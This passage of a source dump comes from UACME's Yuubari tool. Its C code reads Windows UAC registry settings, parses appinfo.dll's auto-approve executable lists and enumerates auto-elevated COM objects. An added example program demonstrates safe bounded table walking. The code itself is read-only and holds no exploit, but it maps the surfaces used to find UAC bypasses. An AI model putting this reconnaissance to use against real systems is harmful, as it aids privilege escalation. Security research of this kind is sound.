            ListStringDataUnsorted(&AppInfo, AiExcludedWindowsDirs, AppInfo.lpExcludedWindowsDirs, OutputCallback);
        }

    } while (FALSE);

    if (usFileName.Buffer != NULL)
        RtlFreeUnicodeString(&usFileName);

    if (DllBase != NULL)
        NtUnmapViewOfSection(NtCurrentProcess(), DllBase);

    if (hSection != NULL)
        NtClose(hSection);

    if (hFile != NULL)
        NtClose(hFile);
}

================================================
FILE: Source/Yuubari/appinfo.h
================================================
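The two list walkers in appinfo.c above (ListAutoApproveEXE and ListStringDataUnsorted) never trust a pointer read out of the mapped appinfo.dll image: each table slot and the string it points at is checked against DllBase/DllVirtualSize, a pointer that lands back inside the table stops the walk, the first character is sanity-checked, the AutoApproveEXE list must stay alphabetically non-decreasing, and over-long strings are skipped rather than aborting the scan. The stand-alone C program below is an added example, not code from UACME, that re-implements that walk over a constructed in-memory image so the stop conditions can be exercised on any platform. IN_REGION, IsCrossPtr and TestChar are defined elsewhere in the project and are not on this page; in_region, crosses_table and test_char are my assumptions about what they check, and the sample table layout, file names and wide-string helpers are constructed for the example.

```c
/* Added example (not UACME code): bounded walk of a string-pointer table inside a
 * mapped image, mirroring the checks in ListAutoApproveEXE / ListStringDataUnsorted. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef uint16_t wchar16;                 /* 2-byte WCHAR as on Windows */
#define MAX_PATH_X2 (260 * 2)             /* length cap used by the scanner (MAX_PATH * 2) */
#define IMG_SIZE    2048
#define TABLE_SLOTS 8

typedef struct { const uint8_t *base; size_t size; } region;   /* DllBase / DllVirtualSize */
typedef void (*entry_cb)(const wchar16 *name, size_t len, void *ctx);

/* IN_REGION analogue (assumed): [p, p+need) must lie wholly inside the mapped image. */
static bool in_region(const region *r, const void *p, size_t need) {
    uintptr_t b = (uintptr_t)r->base, q = (uintptr_t)p;
    return q >= b && q - b < r->size && need <= r->size - (q - b);
}

/* IsCrossPtr analogue (assumed): a "string" lying inside the table slots consumed so far
 * means the walk has run past the real table into unrelated data. */
static bool crosses_table(const void *p, const void *const *table, size_t slot) {
    uintptr_t q = (uintptr_t)p, t = (uintptr_t)table;
    return q >= t && q < t + (slot + 1) * sizeof(void *);
}

/* TestChar analogue (assumed): first character must be printable ASCII. */
static bool test_char(wchar16 c) { return c >= 0x20 && c < 0x7F; }

/* wcslen that never reads past the image; (size_t)-1 if no terminator inside the region. */
static size_t bounded_wlen(const region *r, const wchar16 *s) {
    for (size_t n = 0; in_region(r, s + n, sizeof(wchar16)); n++)
        if (s[n] == 0) return n;
    return (size_t)-1;
}

/* Walk the table like the scanner does: stop at the first slot or string outside the image,
 * at a pointer back into the table, at a non-printable first character, and (for the sorted
 * AutoApproveEXE list) when first characters stop being non-decreasing. Unterminated or
 * over-long strings are skipped but do not stop the walk. Returns entries delivered. */
size_t walk_string_table(const region *r, const void *const *table, size_t max_entries,
                         bool require_sorted, entry_cb cb, void *ctx) {
    size_t delivered = 0;
    wchar16 lk = 0;
    for (size_t i = 0; i < max_entries; i++) {
        if (!in_region(r, &table[i], sizeof(void *))) break;
        const wchar16 *s = (const wchar16 *)table[i];
        if (crosses_table(s, table, i) || !in_region(r, s, sizeof(wchar16))) break;
        wchar16 k = s[0];
        if (!test_char(k) || (require_sorted && k < lk)) break;
        lk = k;                                   /* updated even when the entry is skipped */
        size_t len = bounded_wlen(r, s);
        if (len == (size_t)-1 || len > MAX_PATH_X2) continue;
        if (cb) cb(s, len, ctx);
        delivered++;
    }
    return delivered;
}

/* ---- constructed sample image: pointer table at offset 0, wide strings after it ---- */
static union { uintptr_t align; uint8_t bytes[IMG_SIZE]; } g_img;
static const wchar16 g_outside[] = { 'x', 0 };    /* lives outside the image */

static const void **reset_image(size_t *off) {
    memset(g_img.bytes, 0, IMG_SIZE);
    *off = TABLE_SLOTS * sizeof(void *);
    return (const void **)g_img.bytes;
}
static const wchar16 *put_wstr(size_t *off, const char *ascii) {
    wchar16 *dst = (wchar16 *)(g_img.bytes + *off);
    size_t n = strlen(ascii);
    for (size_t i = 0; i < n; i++) dst[i] = (wchar16)ascii[i];
    dst[n] = 0;
    *off += (n + 1) * sizeof(wchar16);
    return dst;
}
static size_t run(bool sorted) {
    region r = { g_img.bytes, IMG_SIZE };
    return walk_string_table(&r, (const void *const *)g_img.bytes, 100, sorted, NULL, NULL);
}
/* Three names in order, then a slot pointing outside the image: 3 delivered, walk stops. */
size_t run_sorted_sample(void) {
    size_t off; const void **t = reset_image(&off);
    t[0] = put_wstr(&off, "cttune.exe"); t[1] = put_wstr(&off, "inetmgr.exe");
    t[2] = put_wstr(&off, "sysprep.exe"); t[3] = g_outside; t[4] = put_wstr(&off, "zzz.exe");
    return run(true);
}
/* Same names out of order: 2 with the sort check (stops at "inetmgr"), 3 without it. */
size_t run_unsorted_sample(bool require_sorted) {
    size_t off; const void **t = reset_image(&off);
    t[0] = put_wstr(&off, "cttune.exe"); t[1] = put_wstr(&off, "sysprep.exe");
    t[2] = put_wstr(&off, "inetmgr.exe"); t[3] = g_outside;
    return run(require_sorted);
}
/* A 600-char name exceeds MAX_PATH*2 and is skipped; "b.exe" after it is still delivered: 1. */
size_t run_long_entry_sample(void) {
    char longname[601]; memset(longname, 'a', 600); longname[600] = 0;
    size_t off; const void **t = reset_image(&off);
    t[0] = put_wstr(&off, longname); t[1] = put_wstr(&off, "b.exe"); t[2] = g_outside;
    return run(true);
}
/* A string with no NUL before the image ends is skipped without reading past the region: 2. */
size_t run_unterminated_sample(void) {
    size_t off; const void **t = reset_image(&off);
    wchar16 *tail = (wchar16 *)(g_img.bytes + IMG_SIZE - 4);
    tail[0] = 'q'; tail[1] = 'q';
    t[0] = put_wstr(&off, "a.exe"); t[1] = tail; t[2] = put_wstr(&off, "z.exe"); t[3] = g_outside;
    return run(true);
}
/* A slot pointing back into the table itself ends the walk: only "a.exe" delivered. */
size_t run_cross_pointer_sample(void) {
    size_t off; const void **t = reset_image(&off);
    t[0] = put_wstr(&off, "a.exe"); t[1] = (const void *)&t[0]; t[2] = put_wstr(&off, "c.exe");
    return run(true);
}

int main(void) {
    printf("sorted=%zu unsorted(strict)=%zu unsorted(lax)=%zu long=%zu unterminated=%zu cross=%zu\n",
           run_sorted_sample(), run_unsorted_sample(true), run_unsorted_sample(false),
           run_long_entry_sample(), run_unterminated_sample(), run_cross_pointer_sample());
    return 0;
}
```

The point of the sample cases is the failure modes: the real table has no length field and no terminator, so the walk must find its end from the data itself. The out-of-image pointer and the table self-pointer are the "end of table" signals; the unterminated and over-long entries show why length is measured inside the region and why a bad entry skips rather than aborts. Note that, as in the original, the sort-order marker is updated before the length check, so a skipped entry still constrains what may follow it.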
#/******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2014 - 2022 * * TITLE: APPINFO.H * * VERSION: 1.54 * * DATE: 01 Dec 2022 * * Header file for the AppInfo scan. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #pragma once #include typedef enum _AI_DATA_TYPE { AiSnapinFile = 1, AiManagementConsole, AiAutoApproveEXE, AiIncludedPFDirs, AiIncludedSystemDirs, AilpIncludedWindowsDirs, AiExemptedAutoApproveExes, AiExcludedWindowsDirs, AiMax } AI_DATA_TYPE; typedef struct _UAC_AI_DATA { LPWSTR Name; SIZE_T Length; AI_DATA_TYPE Type; } UAC_AI_DATA, *PUAC_AI_DATA; typedef struct _UAC_MMC_BLOCK { LPWSTR lpManagementApplication; PVOID Base; ULONG NumOfElements; ULONG Reserved; } UAC_MMC_BLOCK, *PUAC_MMC_BLOCK; typedef struct _UAC_AI_GLOBALS { ULONG AppInfoBuildNumber; PVOID DllBase; SIZE_T DllVirtualSize; UAC_MMC_BLOCK *MmcBlock; PVOID *lpIncludedWindowsDirs; PVOID *lpIncludedPFDirs; PVOID *lpAutoApproveEXEList; PVOID *lpIncludedSystemDirs; PVOID *lpExemptedAutoApproveExes; PVOID *lpExcludedWindowsDirs; } UAC_AI_GLOBALS, *PUAC_AI_GLOBALS; typedef DWORD(WINAPI *pfnSymSetOptions)( _In_ DWORD SymOptions); typedef BOOL(WINAPI *pfnSymInitializeW)( _In_ HANDLE hProcess, _In_opt_ PCWSTR UserSearchPath, _In_ BOOL fInvadeProcess); typedef BOOL(WINAPI* pfnSymFromNameW)( _In_ HANDLE hProcess, _In_ PCWSTR Name, _Inout_ PSYMBOL_INFOW Symbol); typedef DWORD64(WINAPI *pfnSymLoadModuleExW)( _In_ HANDLE hProcess, _In_opt_ HANDLE hFile, _In_opt_ PCWSTR ImageName, _In_opt_ PCWSTR ModuleName, _In_ DWORD64 BaseOfDll, _In_ DWORD DllSize, _In_opt_ PMODLOAD_DATA Data, _In_ DWORD Flags); typedef BOOL(WINAPI *pfnSymUnloadModule64)( _In_ HANDLE hProcess, _In_ DWORD64 BaseOfDll); typedef 
BOOL(WINAPI *pfnSymCleanup)( _In_ HANDLE hProcess); VOID ScanAppInfo( LPWSTR lpFileName, OUTPUTCALLBACK OutputCallback); ================================================ FILE: Source/Yuubari/basic.c ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2014 - 2025 * * TITLE: BASIC.C * * VERSION: 1.60 * * DATE: 17 Jun 2025 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #include "global.h" VOID QueryAndOutputRegValue( _In_ OUTPUTCALLBACK OutputCallback, _In_ HKEY hKey, _In_ LPWSTR ValueName, _In_ LPWSTR DisplayName, _In_ BOOL IsBool ) { UAC_BASIC_DATA TempData; ULONG Value = 0; LRESULT Result = supRegReadDword(hKey, ValueName, &Value); if (Result == ERROR_SUCCESS) { RtlSecureZeroMemory(&TempData, sizeof(TempData)); TempData.Name = DisplayName; TempData.IsValueBool = IsBool; TempData.Value = Value; OutputCallback((PVOID)&TempData); } } /* * ScanBasicUacData * * Purpose: * * Query UserSharedData flags, UAC registry values. 
* */ VOID ScanBasicUacData( _In_ OUTPUTCALLBACK OutputCallback ) { ULONG Flags = 0; LRESULT lRet; HKEY hKey = NULL; UAC_BASIC_DATA Data; if (OutputCallback == NULL) return; if (!NT_SUCCESS(RtlQueryElevationFlags(&Flags))) return; RtlSecureZeroMemory(&Data, sizeof(Data)); Data.Name = T_FLAG_ELEVATION_ENABLED; Data.IsValueBool = TRUE; Data.Value = ((Flags & DBG_FLAG_ELEVATION_ENABLED) > 0); OutputCallback((PVOID)&Data); Data.Name = T_FLAG_VIRTUALIZATION_ENABLED; Data.IsValueBool = TRUE; Data.Value = ((Flags & DBG_FLAG_VIRTUALIZATION_ENABLED) > 0); OutputCallback((PVOID)&Data); Data.Name = T_FLAG_INSTALLERDETECT_ENABLED; Data.IsValueBool = TRUE; Data.Value = ((Flags & DBG_FLAG_INSTALLER_DETECT_ENABLED) > 0); OutputCallback((PVOID)&Data); lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, T_UAC_SETTINGS_KEY, 0, KEY_READ, &hKey); if (lRet == ERROR_SUCCESS && hKey != NULL) { QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_PROMPT_BEHAVIOR, T_UAC_PROMPT_BEHAVIOR, FALSE); QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_RESTRICTED_AUTOAPPROVE, T_UAC_RESTRICTED_AUTOAPPROVE, FALSE); QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_AUTOAPPROVEIC, T_UAC_AUTOAPPROVEIC, FALSE); QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_AUTOAPPROVEMP, T_UAC_AUTOAPPROVEMP, FALSE); QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_AUTOAPPROVEHARDCLAIMS, T_UAC_AUTOAPPROVEHARDCLAIMS, FALSE); QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_ENABLESECUREUIPATHS, T_UAC_ENABLESECUREUIPATHS, FALSE); QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_SECURE_DESKTOP, T_UAC_SECURE_DESKTOP, TRUE); RegCloseKey(hKey); } } ================================================ FILE: Source/Yuubari/basic.h ================================================ #/******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2014 - 2020 * * TITLE: BASIC.H * * VERSION: 1.49 * * DATE: 11 Nov 2019 * * Header file for the basic UAC info scan. 
* * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #pragma once typedef struct _UAC_BASIC_DATA { LPWSTR Name; DWORD Value; BOOL IsValueBool; } UAC_BASIC_DATA, *PUAC_BASIC_DATA; VOID ScanBasicUacData( _In_ OUTPUTCALLBACK OutputCallback); ================================================ FILE: Source/Yuubari/comobj.c ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2014 - 2025 * * TITLE: COMOBJ.C * * VERSION: 1.60 * * DATE: 17 Jun 2025 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #include "global.h" #include #include #include #pragma comment(lib, "Shlwapi.lib") #pragma comment(lib, "Rpcrt4.lib") VOID CopScanRegistry( _In_ HKEY RootKey, _In_ OUTPUTCALLBACK OutputCallback, _In_ INTERFACE_INFO_LIST *InterfaceList); /* * CopRunOutputCallbackForInterface * * Purpose: * * Output interface information. * */ VOID CopRunOutputCallbackForInterface( _In_ ULONG DataType, _In_ INTERFACE_INFO *Interface, _In_ CLSID clsid, _In_ OUTPUTCALLBACK OutputCallback ) { UAC_INTERFACE_DATA Data; RtlSecureZeroMemory(&Data, sizeof(Data)); Data.DataType = DataType; Data.Name = Interface->szInterfaceName; Data.Clsid = clsid; Data.IID = Interface->iid; OutputCallback((PVOID)&Data); } /* * CopLocateInterfaceByCLSID * * Purpose: * * Search for interface by CLSID. 
* */ INTERFACE_INFO* CopLocateInterfaceByCLSID( _In_ INTERFACE_INFO_LIST *InterfaceList, _In_ CLSID clsid ) { IUnknown *Interface = NULL; IUnknown *TestObject = NULL; ULONG i; INTERFACE_INFO* Result = NULL; if (SUCCEEDED(CoCreateInstance(&clsid, NULL, CLSCTX_INPROC_SERVER, &IID_IUnknown, (LPVOID)&Interface))) { for (i = 0; i < InterfaceList->cEntries; i++) { Interface->lpVtbl->QueryInterface(Interface, &InterfaceList->List[i].iid, &TestObject); if (TestObject != NULL) { TestObject->lpVtbl->Release(TestObject); Result = &InterfaceList->List[i]; break; } } Interface->lpVtbl->Release(Interface); } return Result; } /* * CopQuerySubKey * * Purpose: * * Query subkey elevated COM object name. * */ VOID CopQuerySubKey( _In_ HKEY RootKey, _In_ LPWSTR lpKeyName, _In_ BOOL ElevationKey, _In_ OUTPUTCALLBACK OutputCallback, _In_ INTERFACE_INFO_LIST *InterfaceList ) { LRESULT lRet; HKEY hSubKey = NULL, hAppIdKey = NULL, hServerObjectsKey = NULL; DWORD dwDataSize, dwEnabled = 0; LPWSTR lpName = NULL, lpAppId = NULL, lpAppIdName = NULL, lpLocalizedString = NULL, t = NULL, lpValue = NULL; ULONG i, cValues = 0, cMaxLength = 0, cchValue; CLSID clsid; UAC_REGISTRY_DATA Data; INTERFACE_INFO *LookupInterface; BOOLEAN VirtualFactory = FALSE; //open each sub key lRet = RegOpenKeyEx(RootKey, lpKeyName, 0, KEY_READ, &hSubKey); if ((lRet == ERROR_SUCCESS) && (hSubKey != NULL)) { if (ElevationKey) { do { dwDataSize = sizeof(DWORD); dwEnabled = 0; //query elevation enabled lRet = RegQueryValueEx(hSubKey, TEXT("Enabled"), NULL, NULL, (LPBYTE)&dwEnabled, &dwDataSize ); if (lRet != ERROR_SUCCESS) break; if (dwEnabled != 1) break; // // Check virtual factory. 
// lRet = RegOpenKeyEx(RootKey, TEXT("VirtualServerObjects"), 0, KEY_READ, &hServerObjectsKey); VirtualFactory = ((lRet == ERROR_SUCCESS) && (hServerObjectsKey != NULL)); //query object name lpName = supReadKeyString(RootKey, TEXT(""), &dwDataSize); //query localized string and convert it dwDataSize = 0; t = supReadKeyString(RootKey, TEXT("LocalizedString"), &dwDataSize); if (t) { lpLocalizedString = (LPWSTR)supHeapAlloc((SIZE_T)MAX_PATH * 2); if (lpLocalizedString) { SHLoadIndirectString(t, lpLocalizedString, MAX_PATH, NULL); } supHeapFree(t); } //check if AppId present dwDataSize = 0; t = supReadKeyString(RootKey, TEXT("AppId"), &dwDataSize); if (t) { lpAppId = (LPWSTR)supHeapAlloc((SIZE_T)dwDataSize + 32); if (lpAppId) { _strcpy(lpAppId, TEXT("AppId\\")); _strcat(lpAppId, t); //open AppId key lRet = RegOpenKeyEx(HKEY_CLASSES_ROOT, lpAppId, 0, KEY_READ, &hAppIdKey); if (lRet == ERROR_SUCCESS) { //check if AccessPermisions present lRet = RegQueryValueEx(hAppIdKey, TEXT("AccessPermission"), NULL, NULL, NULL, NULL); if (lRet == ERROR_SUCCESS) { //if they found query name dwDataSize = 0; lpAppIdName = supReadKeyString(hAppIdKey, TEXT(""), &dwDataSize); } RegCloseKey(hAppIdKey); } } supHeapFree(t); } // // Write output // RtlSecureZeroMemory(&Data, sizeof(Data)); if (lpName) { Data.Name = lpName; } else { Data.Name = TEXT("undefined"); } if (lpAppIdName) { Data.AppId = lpAppIdName; } else { if (lpAppId) { Data.AppId = lpAppId; } else { Data.AppId = TEXT("undefined"); } } if (lpLocalizedString) { Data.LocalizedString = lpLocalizedString; } else { Data.LocalizedString = TEXT("undefined"); } Data.Key = (LPWSTR)supQueryKeyName(RootKey, NULL); if (VirtualFactory) Data.DataType = UacCOMDataVirtualFactory; else Data.DataType = UacCOMDataCommonType; OutputCallback((PVOID)&Data); if (Data.Key) { supHeapFree(Data.Key); } // // Output virtual server objects. 
// if (VirtualFactory) { lRet = RegQueryInfoKey(hServerObjectsKey, NULL, NULL, NULL, NULL, NULL, NULL, &cValues, &cMaxLength, NULL, NULL, NULL); if (lRet == ERROR_SUCCESS) { cMaxLength = (DWORD)((cMaxLength + 1) * sizeof(WCHAR)); lpValue = (LPWSTR)supHeapAlloc(cMaxLength); if (lpValue) { for (i = 0; i < cValues; i++) { cchValue = (DWORD)(cMaxLength / sizeof(WCHAR)); if (RegEnumValue(hServerObjectsKey, i, lpValue, &cchValue, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) { if (CLSIDFromString(lpValue, &clsid) == S_OK) { LookupInterface = CopLocateInterfaceByCLSID(InterfaceList, clsid); if (LookupInterface) { CopRunOutputCallbackForInterface( UacCOMDataInterfaceTypeVF, LookupInterface, clsid, OutputCallback); } } } } supHeapFree(lpValue); } } RegCloseKey(hServerObjectsKey); } } while (FALSE); if (lpAppIdName) supHeapFree(lpAppIdName); if (lpAppId != NULL) supHeapFree(lpAppId); if (lpName != NULL) supHeapFree(lpName); } else { CopScanRegistry(hSubKey, OutputCallback, InterfaceList); } RegCloseKey(hSubKey); } } /* * CopEnumSubKey * * Purpose: * * Enumerate key subkeys, check elevation flag. 
* */ VOID CopEnumSubKey( _In_ HKEY hKey, _In_ DWORD dwKeyIndex, _In_ OUTPUTCALLBACK OutputCallback, _In_ INTERFACE_INFO_LIST *InterfaceList ) { BOOL bElevation = FALSE; LRESULT lRet; DWORD dwcbName = 0, cch; LPTSTR lpKeyName = NULL; do { dwcbName = 32 * 1024; lpKeyName = (LPTSTR)supHeapAlloc(dwcbName); if (lpKeyName == NULL) break; cch = dwcbName / sizeof(WCHAR); lRet = RegEnumKeyEx(hKey, dwKeyIndex, lpKeyName, &cch, NULL, NULL, NULL, NULL); if (lRet == ERROR_MORE_DATA) { dwcbName *= 2; supHeapFree(lpKeyName); lpKeyName = NULL; continue; } if (lRet == ERROR_SUCCESS) { //skip wow64 shit if (_strcmpi(lpKeyName, TEXT("Wow6432Node")) == 0) break; if (_strcmpi(lpKeyName, TEXT("Elevation")) == 0) bElevation = TRUE; CopQuerySubKey(hKey, lpKeyName, bElevation, OutputCallback, InterfaceList); } } while (lRet == ERROR_MORE_DATA); if (lpKeyName != NULL) supHeapFree(lpKeyName); } /* * CopScanRegistry * * Purpose: * * Recursively scan registry looking for autoelevated COM entries. * */ VOID CopScanRegistry( _In_ HKEY RootKey, _In_ OUTPUTCALLBACK OutputCallback, _In_ INTERFACE_INFO_LIST *InterfaceList ) { HKEY hKey = NULL; LRESULT lRet; DWORD dwcSubKeys = 0, i; do { //open root key for enumeration lRet = RegOpenKeyEx(RootKey, NULL, 0, KEY_READ, &hKey); if ((lRet != ERROR_SUCCESS) || (hKey == NULL)) break; //query subkeys count lRet = RegQueryInfoKey(hKey, NULL, NULL, NULL, &dwcSubKeys, NULL, NULL, NULL, NULL, NULL, NULL, NULL); if ((lRet != ERROR_SUCCESS) || (dwcSubKeys == 0)) break; for (i = 0; i < dwcSubKeys; i++) CopEnumSubKey(hKey, i, OutputCallback, InterfaceList); } while (FALSE); if (hKey != NULL) RegCloseKey(hKey); } /* * CoEnumInterfaces * * Purpose: * * Remember list of available interfaces, excluding IUnknown. 
*
*/
BOOL CoEnumInterfaces(
    _Inout_ INTERFACE_INFO_LIST *InterfaceList
)
{
    BOOL bResult = FALSE;
    HKEY hKey = NULL;
    LRESULT lRet;
    RPC_STATUS RpcStatus = 0;
    LPWSTR lpKeyName = NULL;
    SIZE_T k;
    DWORD i, cSubKeys = 0, cMaxLength = 0, cchKey;
    IID iid;
    INTERFACE_INFO *infoBuffer;

    __try {
        lRet = RegOpenKeyEx(HKEY_CLASSES_ROOT, TEXT("Interface"), 0, KEY_READ, &hKey);
        if (lRet != ERROR_SUCCESS)
            __leave;

        lRet = RegQueryInfoKey(hKey, NULL, NULL, NULL, &cSubKeys, &cMaxLength,
            NULL, NULL, NULL, NULL, NULL, NULL);
        if ((lRet != ERROR_SUCCESS) || (cSubKeys == 0))
            __leave;

        if (cSubKeys > 0xFFFF) {
            __leave;
        }

        infoBuffer = (INTERFACE_INFO*)supHeapAlloc(cSubKeys * sizeof(INTERFACE_INFO));
        if (infoBuffer == NULL)
            __leave;

        cMaxLength = (DWORD)((cMaxLength + 1) * sizeof(WCHAR));
        lpKeyName = (LPWSTR)supHeapAlloc(cMaxLength);
        if (lpKeyName == NULL) {
            // infoBuffer is not yet owned by InterfaceList, release it on this path.
            supHeapFree(infoBuffer);
            __leave;
        }

        for (k = 0, i = 0; i < cSubKeys; i++) {
            cchKey = (DWORD)(cMaxLength / sizeof(WCHAR));
            if (RegEnumKeyEx(hKey, i, lpKeyName, &cchKey, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) {
                if (IIDFromString(lpKeyName, &iid) == S_OK) {
                    //skip IUnknown
                    if (UuidCompare((UUID*)&iid, (UUID*)&IID_IUnknown, &RpcStatus) == 0)
                        continue;

                    cchKey = MAX_PATH * sizeof(WCHAR);
                    infoBuffer[k].iid = iid;
                    RegGetValue(hKey, lpKeyName, TEXT(""), RRF_RT_REG_SZ, NULL,
                        (LPWSTR)&infoBuffer[k].szInterfaceName, &cchKey);
                    k++;
                    if (k >= cSubKeys)
                        break;
                }
            }
        }

        InterfaceList->cEntries = (ULONG)k;
        InterfaceList->List = infoBuffer;
        bResult = TRUE;
    }
    __finally {
        if (hKey) RegCloseKey(hKey);
        if (lpKeyName) supHeapFree(lpKeyName);
    }

    return bResult;
}

/*
* CoScanBrokerApprovalList
*
* Purpose:
*
* Query list of autoapproval COM objects used by OOBE ICreateObject interface.
* */ VOID CoScanBrokerApprovalList( _In_ OUTPUTCALLBACK OutputCallback, _In_ INTERFACE_INFO_LIST *InterfaceList ) { HKEY hKey = NULL, hSubKey = NULL; LRESULT lRet; LPWSTR lpSubKey = NULL; DWORD i, cSubKeys = 0, cMaxLength = 0, cchSubKey, dwType, dwData, cbData; CLSID clsid; INTERFACE_INFO *LookupInterface; __try { lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, T_UAC_BROKER_APPROVAL_LIST, 0, KEY_READ, &hKey); if (lRet != ERROR_SUCCESS) __leave; lRet = RegQueryInfoKey(hKey, NULL, NULL, NULL, &cSubKeys, &cMaxLength, NULL, NULL, NULL, NULL, NULL, NULL); if ((lRet != ERROR_SUCCESS) || (cSubKeys == 0)) __leave; cMaxLength = (DWORD)((cMaxLength + 1) * sizeof(WCHAR)); lpSubKey = (LPWSTR)supHeapAlloc(cMaxLength); if (lpSubKey == NULL) __leave; for (i = 0; i < cSubKeys; i++) { cchSubKey = (DWORD)(cMaxLength / sizeof(WCHAR)); if (RegEnumKeyEx(hKey, i, lpSubKey, &cchSubKey, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) { // // Check AutoElevationAllowed // if (RegOpenKey(hKey, lpSubKey, &hSubKey) == ERROR_SUCCESS) { dwType = REG_DWORD; cbData = sizeof(DWORD); dwData = 0; if (RegQueryValueEx(hSubKey, TEXT("AutoElevationAllowed"), 0, &dwType, (LPBYTE)&dwData, &cbData) == ERROR_SUCCESS) { if ((cbData == sizeof(DWORD)) && (dwData == 1)) { // // Find interface and output to the callback. // if (CLSIDFromString(lpSubKey, &clsid) == S_OK) { LookupInterface = CopLocateInterfaceByCLSID(InterfaceList, clsid); if (LookupInterface) { CopRunOutputCallbackForInterface( UacCOMDataInterfaceType, LookupInterface, clsid, OutputCallback); } } } } RegCloseKey(hSubKey); } } } } __finally { if (hKey) RegCloseKey(hKey); if (lpSubKey) supHeapFree(lpSubKey); } } /* * CoScanAutoApprovalList * * Purpose: * * Query list of autoapproval COM objects. 
* This key was added in RS1 specially for consent.exe comfort * */ VOID CoScanAutoApprovalList( _In_ OUTPUTCALLBACK OutputCallback, _In_ INTERFACE_INFO_LIST *InterfaceList ) { HKEY hKey = NULL; LRESULT lRet; LPWSTR lpValue = NULL; DWORD i, cValues = 0, cMaxLength = 0, cchValue; CLSID clsid; INTERFACE_INFO *LookupInterface; __try { lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, T_UAC_COM_AUTOAPPROVAL_LIST, 0, KEY_READ, &hKey); if (lRet != ERROR_SUCCESS) __leave; lRet = RegQueryInfoKey(hKey, NULL, NULL, NULL, NULL, NULL, NULL, &cValues, &cMaxLength, NULL, NULL, NULL); if ((lRet != ERROR_SUCCESS) || (cValues == 0)) __leave; cMaxLength = (DWORD)((cMaxLength + 1) * sizeof(WCHAR)); lpValue = (LPWSTR)supHeapAlloc(cMaxLength); if (lpValue == NULL) __leave; for (i = 0; i < cValues; i++) { cchValue = (DWORD)(cMaxLength / sizeof(WCHAR)); if (RegEnumValue(hKey, i, lpValue, &cchValue, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) { if (CLSIDFromString(lpValue, &clsid) == S_OK) { LookupInterface = CopLocateInterfaceByCLSID(InterfaceList, clsid); if (LookupInterface) { CopRunOutputCallbackForInterface( UacCOMDataInterfaceType, LookupInterface, clsid, OutputCallback); } } } } } __finally { if (hKey) RegCloseKey(hKey); if (lpValue) supHeapFree(lpValue); } } /* * CoListInformation * * Purpose: * * Scan registry looking for autoelevated COM. * */ VOID CoListInformation( _In_ OUTPUTCALLBACK OutputCallback, _In_ INTERFACE_INFO_LIST *InterfaceList ) { if (OutputCallback) { CopScanRegistry(HKEY_CLASSES_ROOT, OutputCallback, InterfaceList); } } ================================================ FILE: Source/Yuubari/comobj.h ================================================ #/******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2014 - 2019 * * TITLE: COMOBJ.H * * VERSION: 1.45 * * DATE: 22 Oct 2019 * * Header file for the COM registry objects scan. 
* * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #pragma once #define UacCOMDataCommonType 0 #define UacCOMDataInterfaceType 1 #define UacCOMDataInterfaceTypeVF 2 #define UacCOMDataVirtualFactory 3 typedef struct _INTERFACE_INFO { IID iid; WCHAR szInterfaceName[MAX_PATH]; } INTERFACE_INFO, *PINTERFACE_INFO; typedef struct _INTERFACE_INFO_LIST { ULONG cEntries; INTERFACE_INFO *List; } INTERFACE_INFO_LIST, *PINTERFACE_INFO_LIST; typedef struct _UAC_INTERFACE_DATA { DWORD DataType; LPWSTR Name; CLSID Clsid; IID IID; } UAC_INTERFACE_DATA, *PUAC_INTERFACE_DATA; typedef struct _UAC_REGISTRY_DATA { DWORD DataType; LPWSTR Name; LPWSTR Key; LPWSTR AppId; LPWSTR LocalizedString; } UAC_REGISTRY_DATA, *PUAC_REGISTRY_DATA; VOID CoListInformation( _In_ OUTPUTCALLBACK OutputCallback, _In_ INTERFACE_INFO_LIST *InterfaceList); BOOL CoEnumInterfaces( _Inout_ INTERFACE_INFO_LIST *InterfaceList); VOID CoScanAutoApprovalList( _In_ OUTPUTCALLBACK OutputCallback, _In_ INTERFACE_INFO_LIST *InterfaceList); VOID CoScanBrokerApprovalList( _In_ 